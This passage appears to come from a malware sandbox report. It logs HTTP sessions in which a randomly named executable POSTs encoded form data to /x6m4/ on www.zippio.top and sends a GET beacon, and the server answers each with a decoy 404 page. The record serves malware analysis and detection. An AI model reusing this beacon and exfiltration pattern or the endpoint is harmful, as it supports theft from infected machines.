Oct 10, 2024 14:14:19.716623068 CEST	1236	IN	Data Raw: 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 36 2e 35 20 33 32 34 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 Data Ascii: .7" transform="translate(-296.5 324.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="521.6" cy="794.8" r="3.7" transform="translate(-304.9 325.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="509" cy="765.9" r="3.7"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50024	203.161.46.201	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:21.582484007 CEST	797	OUT	POST /x6m4/ HTTP/1.1 Host: www.zippio.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 221 Origin: http://www.zippio.top Referer: http://www.zippio.top/x6m4/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 58 4f 74 41 71 48 4b 4b 4b 30 37 67 78 74 2f 34 76 50 36 43 69 45 59 39 78 44 39 6c 2f 2b 46 38 68 64 4e 62 70 74 4f 67 45 47 65 55 2b 73 71 76 6a 49 4e 2f 62 38 2b 78 71 43 52 4f 39 6c 42 38 46 46 72 32 4c 74 55 62 49 42 67 45 6b 36 5a 59 4f 32 65 73 44 79 37 6d 5a 5a 64 55 47 30 2b 73 30 33 64 38 34 41 6a 77 66 72 4f 48 4a 42 4b 66 68 2f 5a 54 57 46 2b 44 79 32 6d 41 71 47 64 51 6c 43 46 54 61 55 41 33 64 6b 37 6e 30 6e 69 75 34 52 76 4d 66 66 5a 47 30 65 37 48 52 59 69 45 6a 54 53 48 49 6c 4b 70 70 4c 50 47 31 47 35 66 6f 78 2f 6f 33 4a 71 4b 6a 61 4d 70 61 30 7a 4b 44 79 4c 52 4e 77 6b 59 34 72 70 78 36 68 61 51 75 36 6b 6a 38 57 77 3d Data Ascii: DX3L=XOtAqHKKK07gxt/4vP6CiEY9xD9l/+F8hdNbptOgEGeU+sqvjIN/b8+xqCRO9lB8FFr2LtUbIBgEk6ZYO2esDy7mZZdUG0+s03d84AjwfrOHJBKfh/ZTWF+Dy2mAqGdQlCFTaUA3dk7n0niu4RvMffZG0e7HRYiEjTSHIlKppLPG1G5fox/o3JqKjaMpa0zKDyLRNwkY4rpx6haQu6kj8Ww=
Oct 10, 2024 14:14:22.151725054 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 10 Oct 2024 12:14:22 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 38381 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
Oct 10, 2024 14:14:22.151776075 CEST	1236	IN	Data Raw: 79 3d 22 38 36 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 35 20 32 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 Data Ascii: y="867.7" r="3.7" transform="translate(-346.5 298.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy
Oct 10, 2024 14:14:22.151787043 CEST	448	IN	Data Raw: 74 65 28 2d 33 32 36 2e 32 20 32 39 38 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 Data Ascii: te(-326.2 298.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translat
Oct 10, 2024 14:14:22.151799917 CEST	1236	IN	Data Raw: 79 3d 22 37 39 38 2e 32 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 31 31 2e 38 20 33 30 33 2e 34 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 Data Ascii: y="798.2" r="3.7" transform="translate(-311.8 303.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="456.9" cy="805.7" r="3.7" transform="translate(-317 296.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="440.5" cy="
Oct 10, 2024 14:14:22.151878119 CEST	1236	IN	Data Raw: 28 2d 33 31 36 2e 33 20 33 33 34 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 36 2e 38 22 20 Data Ascii: (-316.3 334.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="536.8" cy="805.3" r="3.7" transform="translate(-308 333.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="539.2" cy="787.7" r="3.7" transform="translate(-2
Oct 10, 2024 14:14:22.151889086 CEST	448	IN	Data Raw: 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 39 30 22 20 63 79 3d 22 37 38 32 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 Data Ascii: style="fill: #ffe029"/> <circle cx="590" cy="782.3" r="3.7" transform="translate(-291.7 354.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="608.2" cy="784.4" r="3.7" transform="translate(-290.7 363.4) rotate(-27.1)" sty
Oct 10, 2024 14:14:22.151900053 CEST	1236	IN	Data Raw: 74 65 28 2d 32 38 34 2e 37 20 33 37 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 Data Ascii: te(-284.7 371.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(
Oct 10, 2024 14:14:22.151911020 CEST	1236	IN	Data Raw: 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 30 39 2e 32 22 20 63 79 3d 22 37 30 31 2e 33 22 20 72 3d 22 33 2e 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c Data Ascii: "fill: #ffe029"/> <circle cx="609.2" cy="701.3" r="3.6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="
Oct 10, 2024 14:14:22.151921988 CEST	448	IN	Data Raw: 63 69 72 63 6c 65 20 63 78 3d 22 35 36 38 22 20 63 79 3d 22 37 33 30 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 30 2e 36 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 Data Ascii: circle cx="568" cy="730.7" r="3.7" transform="translate(-270.6 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <cir
Oct 10, 2024 14:14:22.152162075 CEST	1236	IN	Data Raw: 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 39 31 2e 34 22 20 63 79 3d 22 36 39 31 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 Data Ascii: yle="fill: #ffe029"/> <circle cx="591.4" cy="691.3" r="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-27.1)" sty
Oct 10, 2024 14:14:22.156732082 CEST	1236	IN	Data Raw: 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 33 2e 37 22 20 63 79 3d 22 37 32 35 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 32 20 33 32 33 29 20 72 6f 74 61 74 65 28 2d Data Ascii: <circle cx="533.7" cy="725.5" r="3.7" transform="translate(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(-27.1)" style="fill: #ffe029"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50025	203.161.46.201	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:24.130304098 CEST	10879	OUT	POST /x6m4/ HTTP/1.1 Host: www.zippio.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 10301 Origin: http://www.zippio.top Referer: http://www.zippio.top/x6m4/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 58 4f 74 41 71 48 4b 4b 4b 30 37 67 78 74 2f 34 76 50 36 43 69 45 59 39 78 44 39 6c 2f 2b 46 38 68 64 4e 62 70 74 4f 67 45 48 6d 55 35 5a 6d 76 78 35 4e 2f 61 38 2b 78 31 79 52 4c 39 6c 42 68 46 47 62 79 4c 6f 4d 4c 49 45 38 45 72 35 68 59 5a 58 65 73 4b 79 37 6d 57 35 64 52 4c 55 2b 35 30 33 4e 34 34 41 7a 77 66 72 4f 48 4a 44 69 66 6f 4f 5a 54 51 46 2b 41 31 32 6d 32 38 47 64 34 6c 43 63 6f 61 55 55 4a 61 56 62 6e 31 44 43 75 30 45 62 4d 58 66 5a 41 78 65 36 59 52 59 2b 6c 6a 54 65 4c 49 6b 2b 44 70 4a 54 47 31 43 51 42 38 69 33 63 74 34 4b 5a 2b 6f 67 32 65 57 6a 4b 4d 67 6d 76 63 78 73 74 70 59 68 6e 68 41 4c 34 37 6f 63 77 6c 44 61 52 72 7a 61 6e 68 78 73 79 71 41 72 35 48 71 41 67 6a 46 6e 6b 61 75 34 4e 48 61 73 33 4b 4c 4d 57 77 4a 79 59 2f 68 44 6b 73 51 51 34 6f 44 2b 57 51 55 2f 41 68 72 66 73 32 6d 43 4c 53 79 62 34 71 73 7a 50 2b 45 76 56 52 4f 4c 45 6a 65 45 69 6f 5a 49 6f 6b 31 79 72 42 4a 2b 57 7a 6d 64 6b 61 59 47 6e 35 72 46 78 56 56 4b 62 49 76 31 71 71 43 48 5a 36 [TRUNCATED] Data Ascii: DX3L=XOtAqHKKK07gxt/4vP6CiEY9xD9l/+F8hdNbptOgEHmU5Zmvx5N/a8+x1yRL9lBhFGbyLoMLIE8Er5hYZXesKy7mW5dRLU+503N44AzwfrOHJDifoOZTQF+A12m28Gd4lCcoaUUJaVbn1DCu0EbMXfZAxe6YRY+ljTeLIk+DpJTG1CQB8i3ct4KZ+og2eWjKMgmvcxstpYhnhAL47ocwlDaRrzanhxsyqAr5HqAgjFnkau4NHas3KLMWwJyY/hDksQQ4oD+WQU/Ahrfs2mCLSyb4qszP+EvVROLEjeEioZIok1yrBJ+WzmdkaYGn5rFxVVKbIv1qqCHZ6JGhD0bCuD9w+q9ml8JgrHxcNBbutcMoUIeGPdj2lxITkLmS7BBPYmHkTgUjKD73INR9cufW27ADK3UAPCXiBdXhn5lJ5E6GumhlvrKlliIIsmDn8WPCSDxW4UbGK8Z48wgDtsS1v98iregfOD/EcNLXjtRCGlvDj43JmiHglC2dstFLHaBzR0EM98cuIEuv47DPjUFnB1ffmOWxSCafznuoILhbWqr8MSgWtQsqgXR+hPPPR0ynTwAgdM1ep5oCgSyFSwAUDjpS5THZ50CApQBC5A6HCJ5yjdQfO36naHg42EiqdHOSH8gKXqxOSny3J/YT/44VTrflN/hFjhHBG2waYBnbiRckce/AaXEXYhZ6Qe1KMulRfWURU9nCMfIaw3Sv+vztHZcVcPpiXlSKv41GkUl3d008wP6SC0Tx1VxqtpfdSbL8PMtRr7Osf5+tAtfaJAo0V1WLKJAhABzPW4mxKJfwlWOB6NKHPVi2R5AXp494cSCFGAlbwEvTMo9jIZC1S4OAIgNCOSiMVNJ9PBU/S1ahQuNmNLhamlHYHzoZHrD4+5WlSDe1lcUtiwPp5CDAL6QT0katqC2yTV9gugdmThEWtnzCSxYNkeK2TK1ZIwSFxQdrTEwnYko+UglwgkYvWbfxud3va7ucxQElIxWccy5KiPfJsVJ [TRUNCATED]
Oct 10, 2024 14:14:24.820887089 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 10 Oct 2024 12:14:24 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 38381 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
Oct 10, 2024 14:14:24.820930004 CEST	224	IN	Data Raw: 79 3d 22 38 36 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 35 20 32 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 Data Ascii: y="867.7" r="3.7" transform="translate(-346.5 298.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <c
Oct 10, 2024 14:14:24.820966959 CEST	1236	IN	Data Raw: 69 72 63 6c 65 20 63 78 3d 22 34 35 33 2e 38 22 20 63 79 3d 22 38 34 35 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 33 35 2e 36 20 32 39 39 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e Data Ascii: ircle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="465.2" cy="859" r="3.7" transform="translate(-340.4 306.4) rotate(-27.1)" style="fill: #ffe029"/> <circ
Oct 10, 2024 14:14:24.821001053 CEST	1236	IN	Data Raw: 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 31 35 2e 36 20 33 31 31 2e 34 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 Data Ascii: transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="489.8" cy="791.1" r="3.7" transform="translate(-306.7 310.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="473.1" cy="798.2" r="3.7" t
Oct 10, 2024 14:14:24.821055889 CEST	1236	IN	Data Raw: 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 31 39 2e 37 22 20 63 79 3d 22 38 31 32 2e 39 22 20 72 3d 22 33 2e 37 22 Data Ascii: ate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7" transform="translate(-313.4 326.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="534.7" cy="822.9" r="3.7" transform="translate(-316.3 334.1) rota
Oct 10, 2024 14:14:24.821089983 CEST	672	IN	Data Raw: 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 32 2e 35 22 20 63 79 3d 22 37 39 30 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 37 2e 33 20 33 Data Ascii: 29"/> <circle cx="572.5" cy="790.5" r="3.7" transform="translate(-297.3 347.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="589.7" cy="797.2" r="3.7" transform="translate(-298.5 356.4) rotate(-27.1)" style="fill: #ffe02
Oct 10, 2024 14:14:24.821121931 CEST	1236	IN	Data Raw: 74 65 28 2d 32 38 34 2e 37 20 33 37 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 Data Ascii: te(-284.7 371.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(
Oct 10, 2024 14:14:24.821156025 CEST	224	IN	Data Raw: 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 30 39 2e 32 22 20 63 79 3d 22 37 30 31 2e 33 22 20 72 3d 22 33 2e 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c Data Ascii: "fill: #ffe029"/> <circle cx="609.2" cy="701.3" r="3.6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rot
Oct 10, 2024 14:14:24.821183920 CEST	1236	IN	Data Raw: 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 31 35 2e 37 22 20 63 79 3d 22 37 34 37 2e 37 22 20 72 3d 22 33 2e 37 22 Data Ascii: ate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy="747.7" r="3.7" transform="translate(-273.1 362.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="602.2" cy="735.1" r="3.7" transform="translate(-268.8 355.3) rota
Oct 10, 2024 14:14:24.821221113 CEST	1236	IN	Data Raw: 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 38 37 2e 34 22 20 63 79 3d 22 37 32 34 2e 36 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 36 35 2e 37 20 33 Data Ascii: 29"/> <circle cx="587.4" cy="724.6" r="3.7" transform="translate(-265.7 347.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="590.7" cy="708.2" r="3.7" transform="translate(-257.8 347) rotate(-27.1)" style="fill: #ffe029"
Oct 10, 2024 14:14:24.826306105 CEST	1236	IN	Data Raw: 32 32 2e 32 22 20 63 79 3d 22 36 39 37 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 36 30 2e 34 20 33 31 34 2e 36 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 Data Ascii: 22.2" cy="697.3" r="3.7" transform="translate(-260.4 314.6) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="518.7" cy="713.5" r="3.7" transform="translate(-268.2 314.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="53

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50026	203.161.46.201	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:26.776266098 CEST	513	OUT	GET /x6m4/?DX3L=aMFgpwbmby3jzMbor6S4pB4U7i9WzusTmpcKkMa0AEKKjLWQjqx1br6ZlFdOkGxZA2zGMf8USW80p6x1SUSuJRL7eqdfJHqn6H1d/R32OLL8G1qZhdp9bUU=&GHcxP=10HpjR HTTP/1.1 Host: www.zippio.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Oct 10, 2024 14:14:27.412941933 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 10 Oct 2024 12:14:27 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 38381 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 